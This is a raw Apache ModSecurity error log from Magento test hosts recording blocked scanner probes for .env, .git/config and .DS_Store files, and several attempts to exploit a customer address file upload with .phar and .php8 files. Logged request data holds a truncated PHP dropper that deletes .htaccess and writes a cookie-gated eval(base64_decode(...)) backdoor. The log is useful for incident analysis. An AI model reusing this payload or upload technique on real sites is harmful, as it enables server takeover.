[Fri Dec 12 10:04:13.785926 2025] [:error] [pid 682424] [client 206.189.225.181:37142] [client 206.189.225.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTvajd6uoboiGY3P06OTnwAAAAA"]
[Fri Dec 12 10:04:14.790514 2025] [:error] [pid 682475] [client 206.189.225.181:37148] [client 206.189.225.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTvajlLoVhjmkwL_YHIjQwAAAAY"]
[Fri Dec 12 10:04:14.790761 2025] [:error] [pid 682475] [client 206.189.225.181:37148] [client 206.189.225.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTvajlLoVhjmkwL_YHIjQwAAAAY"]
[Fri Dec 12 10:04:14.790928 2025] [:error] [pid 682475] [client 206.189.225.181:37148] [client 206.189.225.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTvajlLoVhjmkwL_YHIjQwAAAAY"]
[Fri Dec 12 10:04:16.788455 2025] [:error] [pid 682476] [client 206.189.225.181:37162] [client 206.189.225.181] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTvakH_DTRHSKuyzIAr2LQAAAAc"]
[Fri Dec 12 10:04:16.788725 2025] [:error] [pid 682476] [client 206.189.225.181:37162] [client 206.189.225.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTvakH_DTRHSKuyzIAr2LQAAAAc"]
[Fri Dec 12 10:04:16.789461 2025] [:error] [pid 682476] [client 206.189.225.181:37162] [client 206.189.225.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTvakH_DTRHSKuyzIAr2LQAAAAc"]
[Fri Dec 12 15:19:13.583956 2025] [authz_core:error] [pid 682426] [client 139.59.132.8:60896] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 12 15:19:16.580955 2025] [:error] [pid 682424] [client 139.59.132.8:60926] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTwkZN6uoboiGY3P06OT5AAAAAA"]
[Fri Dec 12 15:19:16.582284 2025] [:error] [pid 682424] [client 139.59.132.8:60926] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTwkZN6uoboiGY3P06OT5AAAAAA"]
[Fri Dec 12 15:19:16.582528 2025] [:error] [pid 682424] [client 139.59.132.8:60926] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTwkZN6uoboiGY3P06OT5AAAAAA"]
[Fri Dec 12 15:19:17.581418 2025] [:error] [pid 682474] [client 139.59.132.8:45156] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTwkZTXxTitIpsJr2R8gDQAAAAU"]
[Fri Dec 12 15:19:17.581649 2025] [:error] [pid 682474] [client 139.59.132.8:45156] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTwkZTXxTitIpsJr2R8gDQAAAAU"]
[Fri Dec 12 15:19:17.581824 2025] [:error] [pid 682474] [client 139.59.132.8:45156] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTwkZTXxTitIpsJr2R8gDQAAAAU"]
[Fri Dec 12 15:19:19.582016 2025] [:error] [pid 682475] [client 139.59.132.8:45166] [client 139.59.132.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTwkZ1LoVhjmkwL_YHIjjgAAAAY"]
[Fri Dec 12 15:19:19.582258 2025] [:error] [pid 682475] [client 139.59.132.8:45166] [client 139.59.132.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTwkZ1LoVhjmkwL_YHIjjgAAAAY"]
[Fri Dec 12 15:19:19.582432 2025] [:error] [pid 682475] [client 139.59.132.8:45166] [client 139.59.132.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTwkZ1LoVhjmkwL_YHIjjgAAAAY"]
[Fri Dec 12 17:35:51.892444 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Rule 7f10a62b5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.phar"] [unique_id "aTxEZzXxTitIpsJr2R8gOQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 17:35:51.893210 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.phar"] [unique_id "aTxEZzXxTitIpsJr2R8gOQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 17:35:51.896405 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.phar"] [unique_id "aTxEZzXxTitIpsJr2R8gOQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 17:35:51.896624 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.phar"] [unique_id "aTxEZzXxTitIpsJr2R8gOQAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 17:35:52.096464 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 5y88364f428d25.php8 found within FILES:custom_attributes[country_id]: 5y88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTxEaDXxTitIpsJr2R8gOgAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/y/5y88364f428d25.phar
[Fri Dec 12 17:35:52.097131 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTxEaDXxTitIpsJr2R8gOgAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/y/5y88364f428d25.phar
[Fri Dec 12 17:35:52.097337 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTxEaDXxTitIpsJr2R8gOgAAAAU"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/y/5y88364f428d25.phar
[Fri Dec 12 17:35:53.743279 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Rule 7f10a62b5be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.php8"] [unique_id "aTxEaTXxTitIpsJr2R8gOwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 17:35:53.743757 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.php8"] [unique_id "aTxEaTXxTitIpsJr2R8gOwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 17:35:53.746325 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.php8"] [unique_id "aTxEaTXxTitIpsJr2R8gOwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 17:35:53.746542 2025] [:error] [pid 682474] [client 194.110.207.198:36444] [client 194.110.207.198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/y/5y88364f428d25.php8"] [unique_id "aTxEaTXxTitIpsJr2R8gOwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 10:29:40.963685 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Rule 7fe7ba0cbbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.phar"] [unique_id "aT0yBI1u9oCb1jebgY7yzAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 10:29:40.964239 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.phar"] [unique_id "aT0yBI1u9oCb1jebgY7yzAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 10:29:40.966873 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.phar"] [unique_id "aT0yBI1u9oCb1jebgY7yzAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 10:29:40.967078 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.phar"] [unique_id "aT0yBI1u9oCb1jebgY7yzAAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Dec 13 10:29:41.288065 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 6x88364f428d25.php8 found within FILES:custom_attributes[country_id]: 6x88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT0yBY1u9oCb1jebgY7yzQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/x/6x88364f428d25.phar
[Sat Dec 13 10:29:41.288748 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT0yBY1u9oCb1jebgY7yzQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/x/6x88364f428d25.phar
[Sat Dec 13 10:29:41.288931 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aT0yBY1u9oCb1jebgY7yzQAAAAI"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/x/6x88364f428d25.phar
[Sat Dec 13 10:29:41.620837 2025] [:error] [pid 704178] [client 213.109.224.165:19641] [client 213.109.224.165] ModSecurity: Rule 7fe7ba0cbbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/x/6x88364f428d25.php8"] [unique_id "aT0yBY1u9oCb1jebgY7yzgAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
